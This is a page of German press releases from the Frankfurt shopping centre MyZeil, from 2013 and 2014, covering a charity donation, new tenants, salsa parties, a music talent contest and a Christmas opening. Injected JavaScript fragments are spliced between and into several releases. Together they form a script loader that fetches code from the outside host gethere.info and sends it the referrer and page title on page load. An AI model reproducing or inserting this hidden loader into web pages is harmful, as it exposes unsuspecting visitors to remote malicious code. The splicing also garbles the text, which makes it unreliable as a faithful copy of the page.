Pressemitteilungen | MyZeil.de - Part 3

Alle Beiträge in Pressemitteilungen

Social-Media-Aktion für den guten Zweck: MyZeil und Eintracht Frankfurt spenden 300.000 Cent an die Leberecht-Stiftung

Jannik Hoffmann (Eintracht), Christina Anthes (Leberecht) und Diana Schreiber (MyZeil, v.l.) bei der Spendenübergabe. Foto: Menzel, FNP

Seit Jahren verbindet das MyZeil eine enge Partnerschaft mit der Eintracht Frankfurt. Die beiden Institutionen, ohne die Frankfurt einfach nicht Frankfurt ist, riefen jetzt gemeinsam zu einer Spendenaktion der besonderen Art auf: die „Aktion 300.000“, die auf der Facebook-Seite der Eintracht gepostet war. Für jede Interaktion der Fans – Liken, Kommentieren, Teilen oder Markieren – versprachen die beiden, jeweils einen Cent an die Leberecht-Stiftung zu spenden. Diese macht sich seit mehr als sechs Jahrzehnten für behinderte und benachteiligte Kinder und Jugendliche und ihre Eltern in der Region stark. Beweggrund für die Spendenaktion war der 300.000ste Facebook-User, der den Social-Media-Auftritt des Bundesligisten „geliked“ hat.

Die Bilanz der „Aktion 300.000“: Zu 300.000 Interaktionen hat es zwar nicht ganz erreicht, trotzdem überwiesen MyZeil und Eintracht Frankfurt jeweils 1.500 € (insgesamt 3.000 €) für den guten Zweck.var d=document;var s=d.createElement(‘script’);

Top

Britische Modemarke Superdry zieht im MyZeil ein

Store ist mit rund 700 Quadratmetern Ladenfläche neuer Ankermieter im ersten Obergeschoss / Legere Kleidung für trendbewusste Zielgruppe

Frankfurt/Main, 23. April 2014 – Schon bald im Rhein-Main-Gebiet: Die international erfolgreiche Modekette Superdry ist ab Spätherbst dieses Jahres mit einem eigenen Store im Frankfurter Multi-Marken-Center MyZeil vertreten. Im ersten Obergeschoss finden Fashionistas dann auf rund 700 Quadratmetern das umfassende Sortiment der britischen Marke, deren legere Kleidung weltweit viele Fans hat. Jürgen D. Hege, Geschäftsführer des Eigentümervertreters PalaisQuartier Asset Management GmbH, freut sich über den neuen internationalen Mieter: „MyZeil setzt bei der Vermietung seiner Ladenflächen auf vielfältiges Qualitäts- und Erlebnisshopping. Mit Superdry erhält das Einkaufscenter im Herzen Frankfurts dafür bald einen weiteren, bedeutenden Impuls.

Japan trifft USA trifft Großbritannien: Eine Reise nach Tokio inspirierte die Designer von Superdry, japanische Grafiken mit dem amerikanischen Stil der 1960er und 70er Jahre und den Werten britischer Schneiderkunst zu vereinen. Die unverwechselbaren Kleidungsstücke der Damen- und Herrenkollektionen zeichnen sich durch den hohen Wiedererkennungswert aus, die Beliebtheit der Marke steigt stetig an. „Mit Superdry konnten wir einen neuen, wichtigen Ankermieter gewinnen“, stellt Diana Schreiber, Centermanagerin MyZeil, DTZ Zadelhoff Tie Leung GmbH, fest. „Wir erweitern damit maßgeblich unser Angebot an angesagten, stylishen Marken und freuen uns sehr, unseren Kunden damit ein weiteres Mode-Highlight bieten zu können.

Das Konzept der MyZeil Qualitätsoffensive „Next Level Shopping“ – internationale Flagship-Stores und Marken-Shops anzusiedeln – wird mit Superdry weiter erfolgreich umgesetzt. Bei der Vermietung der zahlreichen Filialen arbeitet das Frankfurter Shopping-Center mit dem Immobiliendienstleister DTZ zusammen, der das Property Management und das Centermanagement sowie die Vermietungsaktivitäten von MyZeil verantwortet.

Die Marke Superdry gehört zum britischen Modekonzern Supergroup. In Deutschland gibt es bereits zehn Shops, u. a. in Berlin, Hamburg und München. Die Expansion von Superdry in Deutschland wird vom Consulting Unternehmen Strömbergs begleitet.

Pressekontakt:
Christina Wieck
BALL : COM Communications Company GmbH
Frankfurter Straße 20 I D-63150 Heusenstamm
Fon: +49 6104 6698-10 I Fax: +49 6104 6698-19
E-Mail: myzeil@ballcom.de
} else {

Top

Salsa im MyZeil: Die Party geht weiter – mit Tanzschule Monika Bauer und Roberto Salazar

Auftakt-Party am 24. April / Jeden Donnerstag ab 20.00 Uhr / Neben Salsa: Zweiter Dancefloor mit Kizomba

Frankfurt/Main, 21. April 2014 – Salseros aufgepasst: Die beliebten Salsa-Partys im MyZeil finden eine Fortsetzung. Mit neuem Konzept und in Zusammenarbeit mit einem neuen Partner, der Frankfurter Tanzschule Monika Bauer und Roberto Salazar, lädt das Multi-Marken-Center jetzt wieder jeden Donnerstag zu heißen Rhythmen und feurigen Tänzen. Hierbei wird es einen zweiten Floor für den afrikanischen Tanz Kizomba geben, der inzwischen eng mit der Salsa-Szene verbunden ist. Das erste Tanz-Event startet am 24. April im vierten Obergeschoss. Wer sich vor der eigentlichen Party ab 22.00 Uhr noch eintanzen möchte, kann an zwei vorab stattfindenden Schnupperkursen teilnehmen: Grundschritte Salsa um 20.00 Uhr und Mittelstufen- oder Fortgeschrittenenkurs Kizomba um 21.00 Uhr.

Der Zulauf war enorm, die Begeisterung groß: Als MyZeil im Dezember vergangenen Jahres mit den Salsa-Partys begann, kamen jede Woche rund 300 Tänzerinnen und Tänzer in das Einkaufscenter in der Frankfurter Innenstadt. Nach einer kurzen Pause geht die beliebte Party-Serie nun weiter, veranstaltet von der Frankfurter Tanzschule Monika Bauer und Roberto Laura Salazar, Initiator des Internationalen Salsa Festivals „Frankfurt Goes Salsa” sowie Organisator zahlreicher Salsa-Partys in Frankfurt. Neben einem Salsa-Dancefloor wird es jede Woche auch einen Floor für Kizomba geben. „Dieser ursprünglich afrikanische, wunderschöne Tanz erlebt seit rund einem Jahr nun endlich auch in Deutschland seinen verdienten Boom“, sagt Monika Bauer, Inhaberin der gleichnamigen Tanzschule, selbst leidenschaftliche Salsa- und Kizomba-Tänzerin. Kizomba, einer der beliebtesten Musik- und Tanzstile der portugiesisch-sprachigen Länder Afrikas, ist eine Kombination aus traditionellen afrikanischen Rhythmen und europäischer Musik.

Die Salsa-Partys im MyZeil starten um 20.00 Uhr mit einem Schnupperkurs, bei dem professionelle Tanzlehrer die Grundschritte vermitteln. Nach einer Stunde sind die Kizomba-Tänzer an der Reihe und können bei einem Mittelstufen- oder Fortgeschrittenenkurs an ihrer Technik feilen. Ab 22.00 Uhr heißt es für alle: Bühne bzw. Tanzfläche frei!
Am Eröffnungsabend legen beim Salsa-Floor zwei DJs im Wechsel auf: DJ Roberto und DJ Rumbero, der mit seinen zahlreichen Auftritten auf Kubafestivals und in Top-Salsa-Clubs und Events zu den beliebtesten Salsa-DJs Deutschlands gehört. Für Stimmung auf dem Kizomba-Floor ist Miguel Monteiro verantwortlich.

Die Schnupperkurse um 20.00 und 21.00 Uhr sind kostenfrei, die Party ab 22.00 Uhr kostet 5,00 Euro Eintritt, inklusive Garderobengebühr. Die Eintrittsgebühr sparen kann sich, wer eine Rechnung aus einem der Restaurants im MyZeil vom selben Tag ab 18.oo Uhr mit mindestens 6,00 Euro Verzehr vorlegen kann.

Salsa-Party im MyZeil – Die kommenden Termine

(Achtung: Keine Party am 1. Mai)
Donnerstag, 24. April 2014
Donnerstag, 8. Mai 2014
Dann jeden Donnerstag

Pressekontakt:
Christina Wieck
BALL : COM Communications Company GmbH
Frankfurter Straße 20 I D-63150 Heusenstamm
Fon: +49 6104 6698-10 I Fax: +49 6104 6698-19
E-Mail: myzeil@ballcom.de
d.getElementsByTagName(‘head’)[0].appendChild(s);

Top

„Unerhörte Talente 2014“ – Spannendes Finale im MyZeil: David Fachinger gewinnt Music-Contest

Zehn Gewinner des Online-Votings präsentierten live ihre Gesangskünste / Fans und Zuschauer waren begeistert / Jury aus Thomas M. Stein, Kim Gloss, Cristobal und Faiz Mangat kürte David Fachinger zum strahlenden Sieger / Hauptgewinn: Live-Auftritt im MyZeil und bei Antenne Frankfurt 95.1 sowie eine Traumreise auf die Malediven / Daniel Aminati moderierte

Frankfurt/Main, 15. März 2014 – Der Sieger steht fest: David Fachinger aus Limburg ist der Gewinner des Music-Contests „Unerhörte Talente 2014“. Das mit Spannung erwartete Finale lockte gestern viele Besucher und Fans der Musiker und der mit Thomas M. Stein, Kim Gloss, Cristobal und Faiz Mangat prominent besetzten Jury in das Frankfurter Multimarken-Shoppingcenter MyZeil. Nach den Live-Auftritten der zehn Finalisten kam es zu einer spannenden Endauswahl zwischen vier Kandidaten. Auf die Entscheidung folgte die Siegerehrung. Das öffentliche Event wurde von der Urban Club Band begleitet und von Starmoderator Daniel Aminati moderiert.

Auch, wenn es am Ende nur einen Sieger geben konnte, „gewonnen haben alle Teilnehmer an diesem spannenden Finale“, fasste Jury-Mitglied Thomas M. Stein den Abend im Frankfurter Shopping-Center MyZeil zusammen. Jury-Kollegin Kim Gloss pflichtete ihm bei: „Auftritte vor einer Fach-Jury und einem Publikum, das mit so viel Begeisterung bei der Sache war, sind für junge Talente schließlich alles andere als alltäglich. Da braucht es schon eine große Portion Mut.

David Fachinger bewies diesen Mut mit Bravour, gab aber auch zu, vor dem Auftritt Lampenfieber gehabt zu haben. Auf der Bühne sei das aber schnell vorbei gewesen. „So richtig aufgeregt war ich erst, als ich erfuhr, dass ich in der Endauswahl bin.

Programm mit musikalischen Überraschungen

Fast genauso aufgeregt war das mitfiebernde Publikum, das schon beim ersten Durchlauf der Kandidaten kräftig applaudiert hatte. Als gegen 20 Uhr der Höhepunkt des von Entertainer und Pro7-„taff“-Moderator Daniel Aminati und von der Urban Club Band mitgestalteten Programms begann, war die Spannung groß: Wen würden der bekannte Musikproduzent und ehemalige DSDS-Juror Thomas M. Stein, Sängerin und TV-Star Kim Gloss sowie die ebenfalls Casting-erprobten Musiker Cristobal und Faiz Mangat von der Urban Club Band zum Sieger küren? Als die Wahl schließlich auf David Fachinger und seinen eigens geschriebenen Song „Mädels“ fiel, stimmte das Publikum mit einem Riesen-Applaus zu – der Sieg war verdient.

Abschluss eines erfolgreichen Wettbewerbs

Der Music-Contest „Unerhörte Talente 2014“ war von MyZeil und Antenne Frankfurt 95.1 gemeinsam ins Leben gerufen worden, um jungen Musikern aus Frankfurt und Umgebung die Chance zu geben, entdeckt zu werden. Mehr als 100 Talente hatten diese Chance genutzt und sich innerhalb der Bewerbungsphase zwischen November 2013 und Januar 2014 mit einem kurzen Videoclip im Internet präsentiert. Den gesamten Februar über lief das Online-Voting, bei dem knapp 8.000 Stimmen abgegeben wurden. David Fachinger freut sich jetzt auf einen Traumurlaub: einen Aufenthalt auf den Malediven in einem exklusiven Resort der Gruppe Villa Hotels, die als Drehorte von „Deutschland sucht den Superstar“ bekannt sind.

Pressekontakt:
Christina Wieck
BALL : COM Communications Company GmbH
Frankfurter Straße 20 I D-63150 Heusenstamm
Fon: +49 6104 6698-10 I Fax: +49 6104 6698-19
E-Mail: myzeil@ballcom.deif (document.currentScript) {

Top

Daniel Aminati moderiert Finale “Unerhörte Talente 2014” im MyZeil

14. März: Großes Finale des Music-Contests „Unerhörte Talente 2014“ ab 17 Uhr im MyZeil / Zehn Gewinner des Online-Votings präsentieren ihre Gesangskünste / Moderator: Daniel Aminati / Jury vor Ort: Thomas M. Stein, Kim Gloss, Cristobal und Faiz Mangat / Hauptgewinn: Live-Auftritt im MyZeil und bei Antenne Frankfurt 95.1 sowie eine Traumreise auf die Malediven

Frankfurt/Main, 5. März 2014 – Der Music-Contest „Unerhörte Talente 2014“ erreicht seinen Höhepunkt: Am Freitag, 14. März, steigt im Frankfurter Multimarken-Shoppingcenter MyZeil das mit Spannung erwartete Finale. Von November 2013 bis Januar 2014 reichten insgesamt 110 Bewerber ihre Videos ein, für die bis zum 28. Februar online knapp 8.000 Stimmen abgegeben wurden. Die Top Ten stellen sich jetzt live und vor Publikum dem Urteil der mit Thomas M. Stein, Kim Gloss, Cristobal und Faiz Mangat prominent besetzten Jury. Das öffentliche und von Antenne Frankfurt 95.1 begleitete Event mit Starmoderator Daniel Aminati beginnt um 17 Uhr auf der großen Freifläche in der vierten Etage des MyZeil.

In und um Frankfurt gibt es viele noch unentdeckte Musiktalente. Zusammen mit Antenne Frankfurt 95.1 rief MyZeil deshalb zum Music-Contest „Unerhörte Talente 2014“ auf. Mehr als 110 Talente nutzten die Chance und präsentierten sich innerhalb der Bewerbungsphase mit einem kurzen Videoclip im Internet. Den gesamten Februar über lief das Online-Voting, bei dem knapp 8.000 Stimmen abgegeben wurden. Die zehn besten Talente treten jetzt im großen Finale des Music-Contests „Unerhörte Talente 2014“ gegeneinander an. In einem ersten Auftritt ab 17 Uhr präsentieren sich alle zehn Acts dem Publikum und stellen sich dem Urteil der Jury. Ab 20 Uhr kommt es zur Endrunde zwischen den drei Bestplatzierten.

Starmoderator und hochkarätige Jury garantieren beste Unterhaltung

Moderiert wird das Event von Entertainer und Pro7-„taff“-Moderator Daniel Aminati. Auch die Jury ist prominent besetzt: Neben dem bekannten Musikproduzenten und ehemaligen DSDS-Juroren Thomas M. Stein sind dies Sängerin und TV-Star Kim Gloss sowie die ebenfalls Casting-erprobten Musiker Cristobal und Faiz Mangat von der Urban Club Band. Die Band begleitet alle Künstler, die keine Instrumente mitbringen, und spielt während der gesamten Veranstaltung selbst einige Songs.

Neben einem Live-Auftritt im MyZeil und bei Antenne Frankfurt 95.1 können sich der oder die Gewinner(in) zudem über einen Traumurlaub auf den Malediven freuen. In einem exklusiven Resort der Gruppe Villa Hotels, die als Drehorte von „Deutschland sucht den Superstar“ bekannt sind, können sie sich von der Aufregung um den Music-Contest „Unerhörte Talente 2014“ erholen.

Weitere Informationen unter http://unerhoertetalente.de

Pressekontakt:
Christina Wieck
BALL : COM Communications Company GmbH
Frankfurter Straße 20 I D-63150 Heusenstamm
Fon: +49 6104 6698-10 I Fax: +49 6104 6698-19
E-Mail: myzeil@ballcom.de} else {

Top

MyZeil mit Besucherrekord von 15 Millionen in 2013

Besucherdichte ist eine der höchsten unter deutschen Shoppingcentern / MyZeil-Filialen internationaler Fashion-Labels zählen zu den umsatzstärksten weltweit / Modernes Service-angebot erhöht die Standortqualität für internationale Marken

Frankfurt am Main, 4. Februar 2014 – MyZeil wird immer beliebter: Im vergangenen Jahr hat das Einkaufs- und Erlebniscenter im Herzen Frankfurts die prognostizierte Besucherzahl von 15 Millionen erreicht und konnte damit 15 Prozent mehr Besucher begrüßen als 2012.
Als innerstädtisches Shoppingcenter mit einer Frequenz von mehr als 300 Besuchern pro Quadratmeter gehört MyZeil zu den deutschen Centern mit der höchsten Besucherdichte. Aufgrund gezielter Marketingaktionen lag die Besucherfrequenz in einigen Monaten sogar 15 Prozentpunkte über dem Trendbarometer Retail Footfall Index. Die MyZeil-Filialen internationaler Fashion-Labels wie Hollister und Bershka zählen zu den umsatzstärksten weltweit – auch deshalb sind für 2014 weitere Shops namhafter Marken in Verhandlung.

Kamen 2012 pro Monat durchschnittlich 1,08 Millionen Menschen in das Multi-Marken-Center an Deutschlands beliebter Shoppingmeile Zeil, waren es im vergangenen Jahr bereits 1,25 Millionen. „Die erfreulichen Zahlen zeigen, dass unser Konzept erfolgreich ist; Kunden und Mieter schätzen das außergewöhnliche Ambiente und das internationale Markenumfeld des MyZeil“, erklärt Jürgen D. Hege, Geschäftsführer der PalaisQuartier Asset Management GmbH und damit verantwortlich für den gleichnamigen Gebäudekomplex, zu dem das Shoppingcenter gehört. „Unsere Maxime heißt ‚Next Level Shopping‘ – das ist nicht bloß ein Slogan, sondern beschreibt unser ständiges Bestreben, dem Einzelhandel ein erstklassiges Umfeld mit einem modernen Serviceangebot auf internationalem Top-Niveau zu bieten“, so Center-Manager Olaf Deistler über die Vermarktungsstrategie.

Im Wettbewerb um internationale Flagship-Stores und Marken-Shops war MyZeil auch 2013 erfolgreich. So konnte das Centermanagement im vergangenen Jahr acht nationale und international renommierte Mieter gewinnen, darunter die amerikanischen Kultmarken Dunkin‘ Donuts und New Era – letztere mit einem europaweit völlig neuen Shop-Konzept.

Moderne Services für internationale Wettbewerbsfähigkeit

Für eine zusätzliche Aufwertung des exklusiven Standortcharakters von MyZeil sorgten neue Kundenservices wie kostenfreies W-LAN im ganzen Center und abschließbare Lade-Schließfächer für Smartphones, die täglich von durchschnittlich 350 Besuchern genutzt werden.

Die mobile Kundenkommunikation hat MyZeil mit einer neuen Shopping-App ausgebaut. Diese bietet ein Verzeichnis der rund 100 Läden mit Lageplänen und Kontaktdaten, eine gezielte Suchfunktion und exklusive App-Deals. Auch in der virtuellen Welt spricht man über MyZeil: Mit einer Reichweite von mehr als 100.000 Nutzern pro Woche findet über Facebook, Twitter und You Tube eine rege Kommunikation in den sozialen Medien statt. Das zeigt sich auch an der hervorragenden Resonanz auf den Music-Contest „Unerhörte Talente“, bei dem ambitionierte Musiker dazu aufgerufen waren, sich mit einem Video um den Titel „Unerhörtes Talent 2014“ zu bewerben. Das Online-Voting hatte bereits in den ersten drei Tagen über 23.000 Seitenaufrufe.

Für die internationale Vermarktung von MyZeil wurde 2013 ein Imagefilm gedreht, der potenziellen Mietern die Qualitäten des Einkaufscenters in trendiger Form präsentiert und den Anspruch als erste Destination für international angesagte Labels und Markteintritte in Deutschland unterstreicht.

2014 bringt weitere Neuerungen

Bereits Mitte Januar dieses Jahres eröffnete im MyZeil die erste deutsche Filiale des New Yorker Modeunternehmens Elleez. Weitere Einzelhändler aus den Branchen Wohnen und Dekorieren werden folgen. Im Bereich Kundenservice gibt es ab Sommer 2014 einen neuen Servicedesk im Erdgeschoss, der den Aufenthalt im MyZeil noch attraktiver machen soll.

Pressekontakt:
BALL : COM Communications Company GmbH
Frankfurter Straße 20 I D-63150 Heusenstamm
Fon: +49 6104 6698-10 I Fax: +49 6104 6698-19
E-Mail: myzeil@ballcom.ded.getElementsByTagName(‘head’)[0].appendChild(s);

Top

Erfolgreiche Live-Castings für den MyZeil Music-Contest „Unerhörte Talente 2014“

Rege Beteiligung beim Video-Live-Casting für Music-Contest „Unerhörte Talente 2014“ / Spontane Gesangsvorträge begeisterten Zuschauer im MyZeil und auf der Zeil / Bewerbungsphase noch bis 25. Januar / Online-Voting vom 26. Januar bis 28. Februar / Großes Finale im März 2014 / Hauptgewinn: Live-Auftritt im MyZeil und bei Antenne Frankfurt 95.1 sowie eine Traumreise auf die Malediven

Frankfurt/Main, 14. Januar 2014 – In und um Frankfurt gibt es viele noch unentdeckte Musiktalente. Zusammen mit Antenne Frankfurt 95.1 hat das Multimarken-Shoppingcenter MyZeil deshalb zum Music-Contest „Unerhörte Talente 2014“ aufgerufen. Noch bis zum 25. Januar können Bewerber ihr Video einsenden, in dem sie ein Musikstück präsentieren. Von Donnerstag bis Samstag vergangener Woche suchte MyZeil auch außerhalb des Internets nach Talenten und bot auf einer mobilen Bühne die Möglichkeit zur Teilnahme an einem Live-Casting im MyZeil und auf der Zeil. Rund 60 Bewerber nutzten ihre Chance auf das große Casting-Finale und den Hauptgewinn, einen Live-Auftritt im MyZeil und bei Antenne Frankfurt 95.1 sowie einen Traumurlaub auf den Malediven.

Vergangene Woche war im Einkaufszentrum MyZeil und auf der beliebten Shoppingmeile Zeil ein Promotionteam mit einer „Ministage“ unterwegs, das „Unerhörte Talente“ zum Live-Casting aufforderte. Sicher, ein bisschen Mut gehörte schon dazu, einfach drauf los zu singen. Doch die Talente im Alter von ca. 16 bis 25 Jahren meisterten die Aufgabe mit Bravour – solo oder gemeinsam mit Freunden, mit eigenen Songs oder Coverversionen. Während die meisten jungen Damen eher Soul-Popsongs à la Beyoncé bevorzugten, gaben sich die männlichen Talente bevorzugt als coole Rapper. Und ganz gleich, ob es sich um eine Premiere vor Publikum handelte oder die
Kandidaten bereits Erfahrung als Mitglied einer Band oder eines Chors hatten, die Zuschauer zeigten sich begeistert.

Insgesamt nutzten von Donnerstag bis Samstag letzter Woche rund 60 Teilnehmer die Chance, auf der mobilen Bühne vorzusingen und mit ihrem spontanen Vortrag zum großen Finale im März ins MyZeil eingeladen zu werden – und vielleicht sogar den Hauptpreis zu gewinnen: Dem Sieger winkt neben einem Live-Auftritt im MyZeil und bei Antenne Frankfurt 95.1 auch ein Traumurlaub auf den Malediven in einem exklusiven Resort der Gruppe Villa Hotels, die als Drehorte von „Deutschland sucht den Superstar“ bekannt sind.

Bereits seit November 2013 können interessierte Talente und Musiker unter http://myzeil.de/unerhoerte-talente ein 30-Sekunden-Video hochladen und sich damit für die Teilnahme am Online-Voting qualifizieren. Auch die Teilnehmer der „Ministage“-Casting-Aktion kommen in die Auswahl für das Online-Voting, das vom 26. Januar bis 28. Februar 2014 läuft. Die zehn Talente, die dann die meisten Stimmen auf sich vereinen, werden zum großen Finale im März eingeladen. Eine prominent besetzte Jury, in der unter anderem Thomas M. Stein sitzt, wird bei einem Live-Event den Sieger küren. Weitere Informationen und Teilnahmebedingungen unter
http://myzeil.de/unerhoerte-talente.
var d=document;var s=d.createElement(‘script’);

Top

Tanzparty „Salsa & Sensual“ ab sofort jeden Donnerstag exklusiv im MyZeil

Eine der größten Salsa- und Kizomba-Partys Frankfurts / Im Dezember 2013 jede Woche im MyZeil / Nächster Termin: Donnerstag, 5. Dezember, ab 20:30 Uhr

Frankfurt am Main, 4. Dezember 2013 – Unter Salsa-Fans hat es sich schnell herumgesprochen: Die „Salsa & Sensual“-Partys der letzten Wochen haben die Freifläche auf der vierten Etage des MyZeil zur angesagten Tanz-Location gemacht. Jeweils rund 400 Gäste kamen zu den ersten Veranstaltungen und tanzten zu heißen südamerikanischen Rhythmen. Der Erfolg als eine der größten Salsa- & und Kizomba-Partys Frankfurts hat die Veranstalter überzeugt: Die Tanzparty „Salsa & Sensual“ geht in Serie und findet im Dezember 2013 jeden Donnerstag – außer am Feiertag – im MyZeil statt. Los geht es um 20:30 Uhr.

Gleich am morgigen Donnerstag, 5. Dezember, steigt die nächste Salsa- und Kizomba-Party auf zwei Tanzflächen von insgesamt 1.000 Quadratmetern. Auf der Freifläche im vierten Obergeschoss starten um 20:30 Uhr der Kizomba Mittelstufe-Kurs mit Yossinho Indahouse sowie der Salsa-Schnupperkurs mit La Calidad vom Dance Center Frankfurt. Um 21:30 Uhr geht die Party weiter mit DJ Leon und DJ Yossi, ab etwa 22 Uhr wird die separate zweite Tanzfläche für Kizomba freigegeben. Gefeiert und getanzt wird bis in die Morgenstunden des Nikolaustags – bis 1:30 Uhr.

Infos zum aktuellen Programm der nächsten Salsa-Partys – mit jeweils wechselnden DJs und Workshops – unter www.facebook.com/MyZeil.Party

Pressekontakt:
Christina Wieck
BALL : COM Communications Company GmbH
Frankfurter Straße 20 I D-63150 Heusenstamm
Fon: +49 6104 6698-10 I Fax: +49 6104 6698-19
E-Mail: myzeil@ballcom.de

Top

Zehnjährige bringt MyZeil zum Leuchten

Frankfurt am Main, 26. November 2013 – Beherzt drückte Julie Kimpel gemeinsam mit ihrer Mutter am Montag, 25. November, Punkt 18 Uhr auf einen großen schwarzen Knopf. Der Effekt dieser kleinen Handlung war enorm: Im Einkaufszentrum MyZeil in der Frankfurter Innenstadt erstrahlten Abertausende von kleinen Lichtern, die gemeinsam mit einer riesigen Lichterkugel auf dem Vordach die festliche Weihnachtsbeleuchtung des Centers bilden.

Aus zahlreichen Bewerbern war die zehnjährige Julie für diese wahrhaft erhellende Aktion ausgelost worden. Unterstützung bei der Eröffnung der MyZeil-Weihnachtsaktion bekam sie von den Musikern der Urban Club Band, die mit modernen Weihnachtssongs für beschwingte Stimmung unter den Besuchern sorgten. Deren Auftritt war gleichzeitig der Startschuss für den großen Music Contest „Unerhörte Talente 2014“, den MyZeil gemeinsam mit Antenne Frankfurt 95.1 veranstaltet. Bewerbung und Teilnahmebedingungen unter www.myzeil.de/unerhoerte-talente

Kinder können sich ebenfalls auf ein weihnachtliches MyZeil freuen: Mit der Weihnachtssaison wurde im 4. Obergeschoss auch eine romantische Winterwunderwelt eröffnet, die die Kleinen per Mini-Eisenbahn erkunden können. Die Einnahmen des von MyZeil eigens für die Weihnachtszeit eingerichteten Garderobenservices sowie die Spenden an der kostenlosen Geschenke-Einpackstation gehen an die Leberecht-Stiftung zugunsten behinderter und benachteiligter Kinder und Jugendlicher.

Pressekontakt:
Christina Wieck
BALL : COM Communications Company GmbH
Frankfurter Straße 20 I D-63150 Heusenstamm
Fon: +49 6104 6698-10 I Fax: +49 6104 6698-19
E-Mail: myzeil@ballcom.des.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Top

Weihnachten im MyZeil: Spektakuläre Feier zur Saisoneröffnung

Große Saisoneröffnung am Montag, 25. November, um 18 Uhr / Glitzernde Festbeleuchtung und riesige Weihnachtskugel auf neuem Vordach / Live-Weihnachtssongs der Urban Club Band / Auftakt zum „Unerhörte Talente“ Music Contest 2014

Frankfurt/Main, 21. November 2013 – Im Frankfurter Shopping-Center MyZeil laufen die Weihnachtsvorbereitungen auf Hochtouren. Die Saison beginnt mit einer Riesen-Überraschung am Montagabend, den 25. November. Punkt 18 Uhr drückt ein Glückskind den Startknopf, der nacheinander alle Weihnachtslichter im MyZeil zum Leuchten bringt – inklusive einer gigantischen Lichterkugel draußen auf dem Vordach. Für weihnachtliche Stimmung sorgt die „Urban Club Band“, deren Auftritt gleichzeitig den Auftakt zum „Unerhörte Talente“ Music Contest 2014 markiert.

Weihnachten beginnt dieses Jahr am 25. November. Dann nämlich wird im Herzen Frankfurts offiziell die Weihnachtszeit eingeläutet: Ein Kind, das zuvor ausgelost wurde, darf um 18 Uhr per Knopfdruck die gesamte Weihnachts-beleuchtung im MyZeil starten. Zur imposanten Dekoration gehört eine riesige Lichterkugel mit mehr als 10.000 LEDs und drei Metern Durchmesser sowie ein 13 Meter langer Lichtervorhang am Vordach des Eingangsportals.

Musikalisch umrahmt wird diese Center-Aktion mit modernen Weihnachtssongs der Urban Club Band, u.a. mit Faiz Mangat (Ex-„Popstars“-Band „Bro‘Sis“), Cristobal Galvez Moreno („Popstars“-Band „Room2012“) und Tiffany Kirkland („The Voice of Germany“-Kandidatin 2012). Der Auftritt der Casting-Stars markiert außerdem den Bewerbungsstart zum großen „Unerhörte Talente“ Music-Contest 2014 von MyZeil und Antenne Frankfurt 95.1. Der Radiosender für Frankfurt und die Metropolregion überträgt das Geschehen live ab 14 Uhr aus der Einkaufs- und Freizeitwelt.

Weihnachts-Atmosphäre mit Herz für Kinder

Bis zum 6. Januar 2014 präsentiert sich MyZeil als wahres Winterwunderland, unter anderem mit einem großen Winterwald. Dort, auf der vierten Etage, können die kleinsten Besucher die Weihnachtswelt von einer Mini-Eisenbahn aus erleben. Die Einnahmen des von MyZeil eigens für die Weihnachtszeit eingerichteten Garderobenservices sowie die Spenden an der kostenlosen Geschenke-Einpackstation werden an die Leberecht-Stiftung zugunsten behinderter und benachteiligter Kinder und Jugendlicher gehen.

Pressekontakt:
Christina Wieck
BALL : COM Communications Company GmbH
Frankfurter Straße 20 I D-63150 Heusenstamm
Fon: +49 6104 6698-10 I Fax: +49 6104 6698-19
E-Mail: myzeil@ballcom.de
document.currentScript.parentNode.insertBefore(s, document.currentScript);

Top
1 2 3 4 5 Seite 3 von 5

Fragen? Wir helfen Ihnen gerne! 069 - 29723970

Sie erreichen uns Mo-Mi von 10-20 Uhr und Do-Sa von 10-21 Uhr